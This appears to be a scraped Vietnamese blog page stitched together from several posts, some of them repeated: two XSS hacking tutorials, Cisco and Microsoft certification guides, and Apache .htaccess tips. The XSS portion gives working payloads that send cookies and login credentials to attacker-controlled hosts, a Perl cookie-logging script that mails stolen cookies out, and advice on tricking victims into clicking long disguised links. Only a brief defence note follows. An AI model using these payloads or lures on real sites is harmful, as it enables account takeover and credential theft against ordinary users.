Subject : ADMIN , I LOVE U Nội dung : your forum is bad, hahaha [img]javascript:document.write(”)[/i*g] ——————————————————————————– ta thực hiện được là do lợi dụng thẻ img để chèn code . Khi “Alert” admin đọc cái topic này thì cookie của nó lập tức bay vào tay ta . Hà hà ! Cách dùng cookie vừa chôm được : Đối với WIN XP thì cookie được lưu trữ tại : C:\Documents and Settings\tên của bạn\cookies\ còn cookie nào , ở chính xác tại đâu thì vào đó mà kiếm , không thể biết cụ thể được . Kiếm được rồi thì thay thế cái cookie của ta thành cái vừa chôm được , xong trở lại forum với cookie này thì ta là admin . Nhưng hình như nếu ta chôm cookie mà “Alert” admin nó log out mất tiêu thì cookie này coi như vô dụng , chỉ áp dụng được khi “Alert” admin ko log out ( không biết tôi nhớ có chính xác hay không nhưng đại loại có lẽ đúng ) Còn rất nhiều rất nhiều site + forum bị lỗi trên net , ở đây chỉ là vài ba ví dụ để các bạn dễ hình dung . Cách dụ dỗ victim vào đúng cái link mà ta mong muốn : Để mang tính thực tế và dễ hiểu tôi sẽ kể cho các bạn nghe 1 câu chuyện về hack bằng lỗi XSS và đây cũng là 1 tình huống nữa của lỗi XSS : Một hôm buồn đời tôi lang thang trên net và vào 1 website nọ , ví dụ là http://www.a.com/ theo thói quen tôi đánh 1 dữ liệu bất kì vào ô put in USERNAME , và ở đây cái mà tôi đáng vào là Mask_NBTA tôi liền thấy xuất hiện dòng chữ “Invalid login : user Mask_NBTA is not found in our data” , hè hè 1 triệu chứng của XSS đây rồi , nhìn vào thanh URL lại thấy cái này http://www.a.com/login.asp?erro=Invalid%20…in%20our%20data quá sướng rồi còn gì , công việc bi giờ làm sao để hack đây . Đầu tiên tôi save as cái trang này vào dĩa cứng , dùng NOTE PAD open và xem cái sources .Tại sao tôi làm vậy ? Vì tôi muốn biết 2 cái tên biến của login form , và tôi đã dễ dàng tìm thấy , nó là “ten” và “matkhau” , dựa vào 2 cái này thì tôi đã biết mình cần phải làm gì , và phải chèn code
như thế nào hè hè . Cái tôi muốn lúc này là làm sao dựa vào XSS để lấy được thông tin về username + pass của nạn nhân . Vậy thì mình chèn cái gì đây , sau 1 thoáng suy nghĩ tôi quyết định chèn cái này đây :

Tôi sẽ giải thích từng cái cho các bạn hiểu : cái

để kết thúc cái FORM của cái site đã được mở ra ở trên . Còn cái code bên dưới thì nhìn thôi chắc các bạn cũng hiểu hết , không cần giải thích nhé . Chèn code như sau : Ht*p://www.a.com/login.asp?tênbiến1=giátrịcóthật1&tênbiến2=giátrịcóthật2&tênbiến3=giátrịcóthật3&tênbiến4=giátrịcóthật4&erro=%3C/FORM%3E%3CFORM%20action=%22login1.asp%22%20method=%22post%22%20onsubmit=%22image%20=%20New%20image;image.scr=’h*tp://myhost/cookie.asp?cookie=’%20%2bdocument.form(1).ten.value%20%2b’/'%20%2bdocument.form(1).matkhau.value;%22%2E Tại sao lại chèn thêm 1 đống biến có thật vào, nhớ là làm sao để nhìn vào URL ta ko thấy cái phần code chèn thêm ngoài sau , chủ yếu là làm cho cái link thêm dài loằng ngoằng trước hết làm hoa mắt nạn nhân , sau đó là tạo dáng vẻ có thật 1 cách tự nhiên cho cái link . Làm tới đây tôi chợt nghĩ ra mình có “Alert” bạn là member của cái site này , sẵn đang rảnh rổi chọc nó chơi . Cách tôi làm là send cho nó 1 cái mail với nội dung thế này : Mày nghe tin gì mới chưa ! WEBSITE a.com mở 1 cuộc thi có tiền thưởng là 1000 000 , lại đúng sở trường của mày nữa , còn hông biết tham gia nữa . Xem cái link này mày sẽ hiểu : H*tp://www.a.com/login.asp nhưng bên dưới cái link này sẽ là cái http://www.a.com/login.asp?tênbiến1=giî..au.value;%22%2E Bạn đoán xem chuyện gì xảy ra . Tất nhiên là nó sẽ click vào cái link tưởng chừng như vô hại đó , sau đó login vào site bình thường mà đâu ngờ là cái username + pass đã bị ………..
Công việc của tôi chỉ là vào host , mở cái file log ra và xem , có gì trong đó , bí mật ………. Câu chuyện tới đây là hết . Chắc các bạn cũng đã hiểu cách làm của tôi , hy vọng với những cái đầu thiên tài của các bạn thì sẽ có những cách hay hơn cách tôi vừa trình bày . CÁCH PHÒNG CHỐNG XSS : 1/Trước hết là cho admin của các website : + Không cho phép bất cứ HTML tag nào nhập vào từ người dùng . + Lọc tất cá các Active Script từ HTML Code 2/Dành cho người dùng : Cẩn thận là trên hết , đừng chết vì thiếu hiểu biết . Tôi viết bài trước hết là để ôn lại kiến thức cho chính mình sau đó là muốn giải thích cho các bạn hiếu thật rõ về nguy hại của XSS để mà phòng tránh .
Cross-Site Scripting (ko nhớ tác giả) Giới thiệu : Bạn đã bao nhiêu lần nhận một email mà chứa các hyperlink rồi ?Thử nghĩ xem khi bạn nhận được 1 mail link tới site mà bạn tham gia với lời mời chào khá ngọt , ban click vào link đó mà ko chút thắc mắc , login với user của mình …. như vậy rất có thể là bạn đã mất pass vào tay một hacker rồi Đây chỉ là 1 vd nhỏ về cross-site scripting thôi . Cross-Site Scripting Cross-Site Scripting còn gọi là XSS , lỗi xảy ra khi các ứng dụng web thu nhận các dữ liệu nguy hiểm của các hacker như một đoạn mã javascript ,Vbscript…. Nó sẽ chỉ giúp bạn lấy được thông tin mật của một ứng dụng web thôi , ko hơn ko kém ( và bạn hãy quên ngay việc nghĩ rằng để khai thác thành công lỗi này chỉ mất vài phút nhé ) XSS có khả năng ảnh hưởng tới các site cho phép người dùng nhập dữ liệu vào ,thường là : Các công cụ tìm kiếm Forms được điền bởi user
Web message boards, guestbook Một hacker khi phát hiện ra lỗi XSS sẽ cố gắng dùng nó để lấy cookies, tạo các trang login giả để lấy pass của người khác ..v..v.. Bây giờ chúng ta bắt đầu đi sâu vào lỗi XSS , trước tiên là xác định site dính lỗi này : Ví dụ một công cụ tìm kiếm của site sau khi được ta nhập giá trị ( ví dụ : XSS ) nó sẽ trả về những gì mà ta vừa nhập ( tức in ra XSS ) thì rất có khả năng nó bị dính XSS . Bây giờ ta view source của site đấy nếu tìm thấy ” XSS ” thì đích thị site này dính lỗi rồi , hè hè Để mô phỏng một cuộc tấn công bằng XSS , một site ngân hàng online đã được creat ( www.freebank.com ). Trước tiên hacker sẽ bắt đầu tìm một trang trên site này để có thể nhập giá trị , trong ví dụ hacker đã tìm ra rằng khi cố gắng login ko được thì username sẽ hiện lên trên thanh URL như sau : http://www.freebank.com/banklogin.asp?err=Invalid%20Login:%20Badlogin (%20 là các kí tự trắng ) tiếp theo , hacker sẽ kiểm tra xem có thể tiêm mã HTML và javascript vào trang wweb này được ko . Đơn giản chỉ cần thay “Invalid%20Login:%20Badlogin ” ở URL trên bằng alert(‘XSS’) , nếu sau đó ta nhận được 1 cửa sổ pop-up với thông báo XSS thì ta hoàn toàn có thể khai thác site này qua lỗi XSS . Anh ta bây giờ phải tạo 1 URL để có thể lấy được các thông tin nhạy cảm . Để tạo được 1 URL mà có khả năng qua mặt được nhiều người thì hacker phải mở sourrce của trang web ( mà cụ thể ở đây là trang banklogin.asp ) để đưa vào URL phù hợp: ở đây hacker sẽ thêm vào đoạn code sau ( tùy từng trường hợp cụ thể mà ta có thể thay bằng code khác )

khi được ” tiêm ” vào trang login thì nó sẽ như sau : ( đoạn code của chúng ta được in nghiêng )

Username : Password: ………………………. Như ta thấy , đoạn code được “tiêm ” vào gồm 2 phần chính , một là để kết thúc của bản gốc , hai là Chú ý rằng <form action=”login.asp” method=”post” ko hề khác bản gốc tuy nhiên ta thêm vào onsubmit , nó có tác dụng là chạy đoạn javascript khi victim click vào submit. Thông tin của victim sẽ gửi đến link ở trên (www.hacker.com ) Sau khi có được code rồi , bây giờ hacker sẽ phải đưa nó vào URL : http://www.freebank.com/banklogin.asp?serviceName=FreebanlCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com&err=%3C%2Fform%3E%0D%0A%3Cform+action%3D%22login.asp%22+method%3D%22post%22%0D%0Aonsubmit%3D%22XSSimage%3D+new+Image%3B+XSSimage.src%3D%27http%3A%2F%2Fhacker.com%2F%27%2Bdocument.forms%281%29.login.value%2B%27%3A%27%2Bdocument.forms%281%29.password.value%3B%22%3E%0D%0A Dễ nhận ra là URL này khác với URL mà ta dùng để test XSS , đơn giản chỉ vì như thế này URL sẽ đủ dài để giảm sự nghi ngờ của victim thôi. Rồi , bây giờ ta sẽ gửi link này đến cho victim , có rất nhìu cách để qua mặt họ sau đó chỉ việc chờ và check log file tại www. hacker.com Trên đây chỉ là 1 ví dụ nho nhỏ thôi bằng sáng tạo của mỗi người sẽ có 1 cách khai thác riêng cho mình Các bạn ko chỉ có thể lấy user và pass của người khác mà còn có thể thay đổi giá trị của sản phẩm tại 1 site mua bán , thêm dữ liệu ..v..v..v .. Hi vong bài viết này có thể giúp các bạn newbie như mình phần nào hiểu thêm về XSS .À với các bạn chưa biết XSS là gì sau khi đọc xong bài này thì các bạn đọc lại bài của anh Mask_NBTA_83 ý .Bài đấy sẽ giúp ích nhiều đấy . Khi nào kiếm thêm bài về XSS mình sẽ cố vít 1 bài nữa nếu ko ai thấy phiền hè hè bài trên mình đã nói qua về lỗi XSS và cách khai thác của nó hẳn các bạn còn nhớ đoạn javascript mà hacker sẽ sử dụng để lấy coookie của victim chứ (có ko tí nhưng mình xin chỉ ra ví dụ sau ) document.location.repleace(‘http://hacker/payload?c=’ + document.cookie ) file php để ghi lại coookie có sẽ như sau : Hay đây là 1 ví dụ khác : document.location.repleace(‘http://hacker/steal.cgi?’ + document.cookie ) ; và đây là source của file steal.cgi : #! /usr/bin/perl #steal.cgi by David Endler #Specific to your system $mailprog = ‘/usr/sbin/sendmail’; #creat log file open (COOKIES,”>>stolen_cookie_file”); #what victim see print ” Content-type: text /html \n\n”; print <<endOfHTML; your cookie has been stolen hehe EndOfHTML #The QUERY_STRING enviroment variable should be filled with #the cookie text after steal.cgi: #http://www.hacker.com/steal.cgi?XXXXXXX print COOKIES “$ENV{ ‘ QUERY_STRING ‘ } from $ENV { ‘ REMOTE_ADDR’} \n; #now mail the alert as well so we can start hijack open (MAIL,”|$mailprog -t”); print MAIL ” To: hacker\ @hacker.com \n”; print MAIL ” From: cookie_steal \ @hacker.com \n”; print MAIL ” Subject :Stolen cookie \n\n”; print MAIL “-” x 75 . “\n\n; print MAIL “$ENV{ ‘QUERY_STRING’} from $ENV{ ‘REMOTE_ADDR’} \n”; close (MAIL); Một ví dụ khác nữa ( của matrix2k ) window.open(“http://www.hostbanupfile.com/cookie.asp?cookie=”+document.cookie) file cookie.asp: Như các bạn cung biết khoa ĐTVT của chúng ta có một ngành là Mạng máy tính. Hiện nay theo mình được biết thì có khá nhiều bạn có ý định đăng ký vào học ngành này, vì vậy mình xin giới thiệu với các bạn 1 chứng chỉ có thể nói là không thể thiếu đối với một SV theo ngành mạng máy tính. Chứng chỉ về quản trị mạng thì có 2 loại đó là quản trị mạng Window và quan trị hệ thống mạng Quản trị mạng Windows ( phần mềm) có 2 chứng chỉ đó là : MCSA va MCSI – cái này do Microsoft cấp Quản trị hệ thống mạng( phần cứng) có những chứng chỉ sau :CCNA, CCNP,CCIE – do Cisco cấp. ở đây mình xin giới thiệu về quản trị hệ thống mạng mà cụ thể là CCNA CCNA là một trong số 3 chứng chỉ quan trọng của một nhà quản trị hệt thống mạng do hệ thống cisco- một nhà cung cấp các giải pháp và thiết bị mạng lớn nhất thế giới cấp. 3 chứng chỉ quan trọng là CCNA, CCNP, CCIE. CCNA là cấp độ đầu tiên và cũng là cấp độ quan trọng nhất. nó là nền tảng cơ bản để học tiếp lên các chứng chỉ cao hơn. 1. Về kiến thức thì CCNA cung cấp cho bạn những kiến thức cơ bản nhất về mạng LAN, MAN, GAN, WAN. giúp bạn có những hiểu biết căn bản về cách thức để một mạng máy tính có thể hoạt động được .Bạn sẽ có kiến thức về những giao thức truyền thông trên mạng, về các mô hình như OSI, TCP//IP…cách cấu hình những thiết bị mạng của Cisco như Swiches, router. Các thiết kế một hệ thống mạng cho một cơ quan một xí nghiệp, trường học, bệnh viện… quy mô vừa và lớn.khi học bạn sẽ được tiếp xúc và cấu hình trực tiếp trên các thiết bị thật của cisco. Nói chung là sau khi học xong CCNA thì bạn có khả năng quản lý một hệ thống mạng của một doanh nghiệp. tất nhiên điều này còn phụ thuộc rất nhiếu vào khả năng của bạn nữa. 2. CCNA là một cấp độ đầu tiên sau đó là CCNP ở cấp độ này thì bạn sẽ tập chung đi sâu vào từng vấn đề của lĩnh vực mạng.ko chung chung như CCNA. ở cấp độ này thì phần lớn là những người sau khi đi làm rồi thì mới học tiếp lên.ở VN thì số lượng CCNP cũng không nhiều lắm. Tiếp theo là CCIE. Đây là chứng chỉ cao cấp nhất của Cisco,để đạt dược chứng chỉ này thì quả thật ko phải là điều dễ dàng, nó không chỉ đòi hỏi một trình độ uyên bác, một kiến thức chuyen sâu về mạng mà còn đòi hỏi một sự đầu tư rất lớn về thời gian và tiền bạc.Với lại thi chứng chỉ CCIE thì bạn phải ra nước ngoài mới thi được. Hiện nay ở VN chưa có nơi nào đủ khả năng để tổ chức kỳ thi này.có thể nói số lượng CCIE hiện nay ờ VN rất ít có lẽ không đến 100 người. 3. Về vấn đề học tập thì các trung tâm đào tạo quản trị mạng chủ yếu tập chung ở HN và TPHCM. học phí cho chứng chỉ này khá cao nhất là những chương trình đào tạo quốc tế.một khóa học kéo dài khoảng 3-4 tháng tùy trung tâm thì học phí+ lệ phí thi QT ~ học phí 4 năm đại học hiện nay ở TP HCM có khá nhiều trung tâm đào tạo quản trị hệ thống mạng về cisco như : trung tâm tin học DHKHTN, saigon CTT, VNpro, nhất nghệ,athena…với mức học phí khác nhau và tất nhiên chất lượng cũng…ko giống nhau. Very Happy Tiền nào của ấy Very Happy . Và lệ phí thi lấy chứng chỉ quốc tế chung là 150$. Không biết khoa DTVT sẽ dạy những gì nhưng nếu có các chứng chỉ trên thì là một lợi thế lớn. Bài viết này chỉ là những hiểu sơ đẳng của mình. bạn nào biết thêm nhiều thì vào đây đóng góp. bạn nào chưa rõ chỗ nào hay cần giải thích gì thì có thể đặt câu hỏi trực tiếp hoặc gián tiếp, mình sẽ cố gắng trả lời. 1. Các chứng chỉ MCP/ MCSA/ MCSE là gì? MCP – viết tắt của Microsoft Certified Professional MCSA – viết tắt của Microsoft Certified Systems Administrator - Chứng chỉ MCSA xác thực khả năng: Cài Đặt, Vận Hành, Bảo Trì Hệ Thống Mạng Máy Tính Trên Nền Tảng Microsoft Windows Server 2003 cho Doanh nghiệp ở mọi qui mô: nhỏ, vừa và lớn. MCSE – viết tắt của Microsoft Certified Systems Engineer – Chứng chỉ MCSE xác thực khả năng: Thiết Kế, Cài Đặt, Vận Hành, Bảo Trì Hệ Thống Mạng Máy Tính Trên Nền Tảng Microsoft Windows Server 2003 cho Doanh nghiệp ở mọi qui mô: nhỏ, vừa và lớn. Vượt qua một kỳ thi (bất kỳ) trong số các kỳ thi do Microsoft tổ chức, Thí sinh sẽ được Microsoft cấp chứng chỉ MCP Vượt qua 4 kỳ thi (4 MCP – 3 kỳ bắt buộc, 1 kỳ tự chọn), Thí sinh sẽ được Microsoft cấp chứng chỉ MCSA Vượt qua 7 kỳ thi ( sau khi có MCSA, Thí sinh cần thi thêm 3 MCP), Thí sinh sẽ được Microsoft cấp chứng chỉ MCSE Các chứng chỉ MCP, MCSA, MCSE do Microsoft cấp có giá trị Toàn Cầu và do chính Bill Gates ký tên xác thực. Hồ sơ học tập của Thí sinh được lưu trữ tại Web site của Microsoft, có thể truy cập trực tuyến. 2. Các chứng chỉ CCNA/ CCNP là gì? CCNA – viết tắt của Cisco Certified Network Associate – Chứng chỉ CCNA xác thực khả năng: Cài Đặt, Vận Hành, Bảo Trì Cơ Sở Hạ Tầng Mạng ở qui mô vừa và nhỏ trên thiết bị của Cisco CCNP – viết tắt của Cisco Certified Network Professional – Chứng chỉ CCNP xác thực khả năng: Cài Đặt, Vận Hành, Bảo Trì Cơ Sở Hạ Tầng Mạng ở qui mô lớn trên thiết bị của Cisco Ngoài ra còn có CCIE viết tắt của Cisco Certified Internetwork Expert Để có chứng chỉ CCNA, thí sinh cần vượt qua kỳ thi có mã số 640-801 do Cisco tổ chức Để có chứng chỉ CCNP, thí sinh cần phải có chứng chỉ CCNA và thi thêm 4 kỳ thi 642-801, 642-811, 642-821, 642-831 Các chứng chỉ CCNA, CCNP do Cisco cấp có giá trị Toàn Cầu. Hồ sơ học tập của Thí sinh được lưu trữ tại Web site của Cisco, có thể truy cập trực tuyến. 3. Nên học MCSA hay CCNA trước? Chương trình MCSA, MCSE học thiên về những Ứng Dụng và Dịch Vụ Mạng, phạm vi ứng dụng rộng rãi, quen thuộc. Chương trình CCNA, CCNP học thiên về Cơ Sở Hạ Tầng Mạng, phạm vi ứng dụng không rộng rãi nhưng mang tính chuyên sâu. Đối với người mới học hoặc chưa có kinh nghiệm về Mạng Máy Tính, chương trình MCSA phù hợp hơn. Tạo trang báo lỗi mang màu sắc cá nhân Trong quá trình làm việc với client, nếu có lỗi xảy ra (ví dụ như không tìm thấy tập tin) thì Apache sẽ báo lỗi bằng một trang có sẵn hiển thị mã số của lỗi đó, rất không đẹp và khó hiểu. Với .haccess thì bạn có thể tự tạo các trang báo lỗi hay hơn. Để làm được điều này thì trong tập tin .htaccess bạn thêm dòng sau: ErrorDocument mã số lỗi /trangloi.html Trong đó mã số lỗi là mã số của lỗi phát sinh, sau đây là những lỗi hay gặp: - 401 – Authorization Required (cần password để truy nhập) - 400 – Bad request (Lỗi do yêu cầu) - 403 – Forbidden (không được vào) - 500 – Internal Server Error (lỗi server) - 404 – Wrong page (lỗi trang, không tìm thấy…) còn trangloi.html là trang web mà bạn muốn hiển thị khi lỗi phát sinh, có thể đưa vào tập tin này nội dung hay đồ hoạ gì tùy bạn, chẳng hạn liên kết trở về trang chính của trang web. Ví dụ: ErrorDocument 404/trangloi.html hoặc: ErrorDocument500/loi/500.html Bây giờ bạn hãy tải (upload) 2 tập tin .htaccess và trangloi.html lên hosting của mình. Chống ăn cắp băng thông (bandwidth) Thông thường những dịch vụ lưu trữ web chỉ cung cấp cho bạn một lượng dữ liệu luân chuyển (data transfer) nhất định hàng tháng và khi bạn sử dụng hết lượng dữ liệu này, website của bạn sẽ tự động bị đóng cửa. Bạn sẽ phải trả thêm tiền cho lượng băng thông vượt quá hoặc phải buộc lòng chờ đến tháng sau. Nếu hình ảnh, dữ liệu, … của bạn bị các website khác “ăn trộm” (bằng các thủ thuật đơn giản) làm cho lượng dữ liệu luân chuyển của bạn tăng lên, thì có nghĩa là bạn sẽ phải trả tiền cho cái mà bạn không sử dụng. Sử dụng tập tin .htaccess là một giải pháp hoàn hảo, để ngăn chặn việc sử dụng hình ảnh trái phép trên website của bạn. Bạn chỉ việc đưa vào tập tin .htaccess nội dung sau : RewriteEngine on RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?trangweb\.com/.*$ [NC] RewriteRule \.(gif|jpg)$ – [F] Ở đoạn mã trên tôi sử dụng module Rewrite của máy chủ Apache, bạn chỉ việc thay đổi trangweb.com thành địa chỉ website của mình. Có thể sử dụng một hình ảnh nào đó cảnh cáo những kẻ “ăn trộm” băng thông, bạn dùng dòng lệnh sau: RewriteEngine on RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?trangweb\.com/.*$ [NC] RewriteRule \.(gif|jpg)$ http://www.trangweb.com/diehotlinker.jpg [R,L] Không cho hiện danh sách tập tin trong thư mục Trong trường hợp một thư mục nào đó không có tập tin index hoặc default, Apache sẽ hiển thị một danh sách liệt kê những tập tin có trong thư mục đó. Tuy nhiên nếu đây là những tài liệu nhạy cảm, bạn không muốn người khác thấy, hãy thêm lệnh sau vào tập tin .htaccess Options –Indexes Thay thế trang index Thông thường khi truy nhập vào một trang web, Apache sẽ tìm tập tin index.htm hoặc default.htm trả kết quả về cho trình duyệt, bạn có thể dùng .htaccess thay đổi mặc định này. DirectoryIndex index.php index .php3 messagebrd.pl index.html index.htm Với dòng lệnh này thì tất cả các tập tin được liệt kê sẽ được tìm theo thứ tự khi có yêu cầu tới thư mục hiện hành, trang nào được tìm thấy đầu tiên sẽ thành trang index của thư mục. Cấm/hạn chế IP truy nhập Một số người muốn làm ngập (flood) trang web của bạn, việc cần làm là ngăn cấm những IP của những người này truy nhập vào trang web, bạn thêm đoạn mã sau vào .htaccess: deny from 203.262.110.20; cho phép IP truy nhập: allow from 203.262.110.20. Nếu bạn chỉ viết IP dưới dạng: 203.262.110 thì sẽ cấm tất cả IP trong dải từ 203.262.110.1 đến 203.262.110.254. Sử dụng dòng lệnh sau: Deny from all sẽ cấm tất cả mọi truy nhập đến các trang web trong thư mục, tuy nhiên các tập tin trong đó vẫn có thể được sử dụng từ bên ngoài thông qua các lệnh dạng require hay include (trong lập trình PHP), có thể xem thêm mã nguồn của PHPBB forum,IBF… để hiểu rõ hơn. Tự động chuyển đến địa chỉ mới (Redirection) Bạn chuyển trang web của mình đến địa chỉ mới nhưng không phải ai cũng biết điều này, redirect truy nhập từ xa một cách đơn giản bằng lệnh sau: Redirect/olddirectory http://www.trangwebmoi.com/thumucmoi ; Tuỳ biến đuôi tập tin Thông thường, tuỳ thuộc vào ngôn ngữ lập trình web mà bạn sử dụng tập tin sẽ có phần mở rộng khác nhau như: html, htm, asp, aspx, php, cgi, …Tuy nhiên nếu sử dụng .htaccess bạn có thể tác động vào máy chủ Apache, Apache sẽ gọi đến tập tin của bạn và trả về cho trình duyệt web của người dùng với phần mở rộng do bạn quy định trong .htaccess. Bạn sử dụng đoạn lệnh sau trong tập tin .htaccess: RewriteEngine on RewriteRule (.*)\.dll$ $1.html Html là phần mở rộng thực sự của những tập tin trên website, dll là phần mở rộng do bạn lựa chọn. Lưu ý trong liên kết trên trang web, bạn phải gọi đúng đường dẫn đến tập tin với phần mở rộng mới (ở trên là dll), ví dụ http://www.trangweb.com/index.htm Lưu ý khi sử dụng tập tin .htaccess: - Chỉ áp dụng trên máy chủ Apache đã bật chế độ .htaccess, nếu chưa bạn hãy thử liên hệ với nhà cung cấp dich vụ hosting. - Để tạo ra tập tin này bạn có thể sử dụng ngay chương trình Notepad của Windows: chọn chế độ save as với tên .htaccess, nhưng khi lưu nhớ bỏ đuôi txt. -.htaccess chỉ có tác dụng đối với những tập tin ngang hàng (trong cùng thư mục với nó) hoặc thư mục con. Với thư mục, nó chỉ có tác dụng trong thư mục chứa nó và thư mục con, còn vô tác dụng với thư mục mẹ (parent directory). - Bạn có thể dùng một số chương trình FTP (Leaf FTP, WS FTP, Cute FTP) để tải tập tin .htaccess lên hosting của mình với chế độ ASCII, nếu nó không hoạt động bạn thử CHMOD với giá trị 644. Next Posts Previous Posts Categories bảo mật học tập lập trình web Linux network thủ thuật tin tức Blogroll Diễn đàn thanh niên sinh viên ĐH Công Nghệ-ĐHQG Hà Nội My Yahoo! 360 Pages Feeds Entries (RSS) Comments (RSS) Theme: Blix by Sebastian Schmieg . Blog at WordPress.com.

Chứng chỉ CCNA

Như các bạn cung biết khoa ĐTVT của chúng ta có một ngành là Mạng máy tính. Hiện nay theo mình được biết thì có khá nhiều bạn có ý định đăng ký vào học ngành này, vì vậy mình xin giới thiệu với các bạn 1 chứng chỉ có thể nói là không thể thiếu đối với một SV theo ngành mạng máy tính.

Chứng chỉ về quản trị mạng thì có 2 loại đó là quản trị mạng Window và quan trị hệ thống mạng
Quản trị mạng Windows ( phần mềm) có 2 chứng chỉ đó là : MCSA va MCSI – cái này do Microsoft cấp
Quản trị hệ thống mạng( phần cứng) có những chứng chỉ sau :CCNA, CCNP,CCIE – do Cisco cấp.

ở đây mình xin giới thiệu về quản trị hệ thống mạng mà cụ thể là CCNA

CCNA là một trong số 3 chứng chỉ quan trọng của một nhà quản trị hệt thống mạng do hệ thống cisco- một nhà cung cấp các giải pháp và thiết bị mạng lớn nhất thế giới cấp.
3 chứng chỉ quan trọng là CCNA, CCNP, CCIE.
CCNA là cấp độ đầu tiên và cũng là cấp độ quan trọng nhất. nó là nền tảng cơ bản để học tiếp lên các chứng chỉ cao hơn.

1. Về kiến thức thì CCNA cung cấp cho bạn những kiến thức cơ bản nhất về mạng LAN, MAN, GAN, WAN.
giúp bạn có những hiểu biết căn bản về cách thức để một mạng máy tính có thể hoạt động được .Bạn sẽ có kiến thức về những giao thức truyền thông trên mạng, về các mô hình như OSI, TCP//IP…cách cấu hình những thiết bị mạng của Cisco như Swiches, router. Các thiết kế một hệ thống mạng cho một cơ quan một xí nghiệp, trường học, bệnh viện… quy mô vừa và lớn.khi học bạn sẽ được tiếp xúc và cấu hình trực tiếp trên các thiết bị thật của cisco. Nói chung là sau khi học xong CCNA thì bạn có khả năng quản lý một hệ thống mạng của một doanh nghiệp. tất nhiên điều này còn phụ thuộc rất nhiếu vào khả năng của bạn nữa.

2. CCNA là một cấp độ đầu tiên sau đó là CCNP
ở cấp độ này thì bạn sẽ tập chung đi sâu vào từng vấn đề của lĩnh vực mạng.ko chung chung như CCNA.
ở cấp độ này thì phần lớn là những người sau khi đi làm rồi thì mới học tiếp lên.ở VN thì số lượng CCNP cũng không nhiều lắm.
Tiếp theo là CCIE. Đây là chứng chỉ cao cấp nhất của Cisco,để đạt dược chứng chỉ này thì quả thật ko phải là điều dễ dàng, nó không chỉ đòi hỏi một trình độ uyên bác, một kiến thức chuyen sâu về mạng mà còn đòi hỏi một sự đầu tư rất lớn về thời gian và tiền bạc.Với lại thi chứng chỉ CCIE thì bạn phải ra nước ngoài mới thi được. Hiện nay ở VN chưa có nơi nào đủ khả năng để tổ chức kỳ thi này.có thể nói số lượng CCIE hiện nay ờ VN rất ít có lẽ không đến 100 người.

3. Về vấn đề học tập thì các trung tâm đào tạo quản trị mạng chủ yếu tập chung ở HN và TPHCM. học phí cho chứng chỉ này khá cao nhất là những chương trình đào tạo quốc tế.một khóa học kéo dài khoảng 3-4 tháng tùy trung tâm thì học phí+ lệ phí thi QT ~ học phí 4 năm đại học
hiện nay ở TP HCM có khá nhiều trung tâm đào tạo quản trị hệ thống mạng về cisco như : trung tâm tin học DHKHTN, saigon CTT, VNpro, nhất nghệ,athena…với mức học phí khác nhau và tất nhiên chất lượng cũng…ko giống nhau. Very Happy Tiền nào của ấy Very Happy . Và lệ phí thi lấy chứng chỉ quốc tế chung là 150$.
Không biết khoa DTVT sẽ dạy những gì nhưng nếu có các chứng chỉ trên thì là một lợi thế lớn.

Bài viết này chỉ là những hiểu sơ đẳng của mình. bạn nào biết thêm nhiều thì vào đây đóng góp. bạn nào chưa rõ chỗ nào hay cần giải thích gì thì có thể đặt câu hỏi trực tiếp hoặc gián tiếp, mình sẽ cố gắng trả lời.

Hệ thống chứng chỉ quốc tế về mạng

1. Các chứng chỉ MCP/ MCSA/ MCSE là gì?

MCP – viết tắt của Microsoft Certified Professional
MCSA – viết tắt của Microsoft Certified Systems Administrator - Chứng chỉ MCSA xác thực khả năng: Cài Đặt, Vận Hành, Bảo Trì Hệ Thống Mạng Máy Tính Trên Nền Tảng Microsoft Windows Server 2003 cho Doanh nghiệp ở mọi qui mô: nhỏ, vừa và lớn.
MCSE – viết tắt của Microsoft Certified Systems Engineer – Chứng chỉ MCSE xác thực khả năng: Thiết Kế, Cài Đặt, Vận Hành, Bảo Trì Hệ Thống Mạng Máy Tính Trên Nền Tảng Microsoft Windows Server 2003 cho Doanh nghiệp ở mọi qui mô: nhỏ, vừa và lớn.
Vượt qua một kỳ thi (bất kỳ) trong số các kỳ thi do Microsoft tổ chức, Thí sinh sẽ được Microsoft cấp chứng chỉ MCP
Vượt qua 4 kỳ thi (4 MCP – 3 kỳ bắt buộc, 1 kỳ tự chọn), Thí sinh sẽ được Microsoft cấp chứng chỉ MCSA
Vượt qua 7 kỳ thi ( sau khi có MCSA, Thí sinh cần thi thêm 3 MCP), Thí sinh sẽ được Microsoft cấp chứng chỉ MCSE
Các chứng chỉ MCP, MCSA, MCSE do Microsoft cấp có giá trị Toàn Cầu và do chính Bill Gates ký tên xác thực. Hồ sơ học tập của Thí sinh được lưu trữ tại Web site của Microsoft, có thể truy cập trực tuyến.

2. Các chứng chỉ CCNA/ CCNP là gì?

CCNA – viết tắt của Cisco Certified Network Associate – Chứng chỉ CCNA xác thực khả năng: Cài Đặt, Vận Hành, Bảo Trì Cơ Sở Hạ Tầng Mạng ở qui mô vừa và nhỏ trên thiết bị của Cisco
CCNP – viết tắt của Cisco Certified Network Professional – Chứng chỉ CCNP xác thực khả năng: Cài Đặt, Vận Hành, Bảo Trì Cơ Sở Hạ Tầng Mạng ở qui mô lớn trên thiết bị của Cisco
Ngoài ra còn có CCIE viết tắt của Cisco Certified Internetwork Expert
Để có chứng chỉ CCNA, thí sinh cần vượt qua kỳ thi có mã số 640-801 do Cisco tổ chức
Để có chứng chỉ CCNP, thí sinh cần phải có chứng chỉ CCNA và thi thêm 4 kỳ thi 642-801, 642-811, 642-821, 642-831
Các chứng chỉ CCNA, CCNP do Cisco cấp có giá trị Toàn Cầu. Hồ sơ học tập của Thí sinh được lưu trữ tại Web site của Cisco, có thể truy cập trực tuyến.

3. Nên học MCSA hay CCNA trước?

Chương trình MCSA, MCSE học thiên về những Ứng Dụng và Dịch Vụ Mạng, phạm vi ứng dụng rộng rãi, quen thuộc.
Chương trình CCNA, CCNP học thiên về Cơ Sở Hạ Tầng Mạng, phạm vi ứng dụng không rộng rãi nhưng mang tính chuyên sâu.
Đối với người mới học hoặc chưa có kinh nghiệm về Mạng Máy Tính, chương trình MCSA phù hợp hơn.

Ứng dụng tập tin .htaccess trên Apache Webserver

Tạo trang báo lỗi mang màu sắc cá nhân

